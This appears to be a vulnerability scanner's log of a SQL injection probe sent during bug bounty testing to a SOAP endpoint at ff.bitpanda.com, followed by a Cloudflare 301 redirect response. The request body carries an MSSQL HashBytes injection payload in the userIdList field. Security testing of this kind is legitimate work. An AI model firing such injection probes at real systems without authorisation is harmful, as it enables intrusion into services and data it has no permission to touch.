[cloud-oa-system-sqli] Dumped HTTP request for http://ff.bitpanda.com/OA/PM/svc.asmx


POST /OA/PM/svc.asmx HTTP/1.1
Host: ff.bitpanda.com
User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/104.0 Safari/537.36
Connection: close
Content-Length: 418
Content-Type: text/xml
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetUsersInfo xmlns="http://tempuri.org/">
      <userIdList>LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','999999999'),2))</userIdList>
    </GetUsersInfo>
  </soap:Body>
</soap:Envelope>
[cloud-oa-system-sqli] Dumped HTTP response http://ff.bitpanda.com/OA/PM/svc.asmx

HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 167
Cache-Control: max-age=3600
Cf-Ray: 96a6723c890b4e70-IAD
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:54:59 GMT
Expires: Tue, 05 Aug 2025 13:54:59 GMT
Location: https://ff.bitpanda.com/OA/PM/svc.asmx
Server: cloudflare
Set-Cookie: _cfuvid=AWaEG_SVchpBe60poGWwyP9R0G0bpV8yjaFwG.IA1_M-1754398499309-0.0.1.1-604800000; path=/; domain=.bitpanda.com; HttpOnly
Vary: Accept-Encoding
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>cloudflare</center>
</body>
</html>

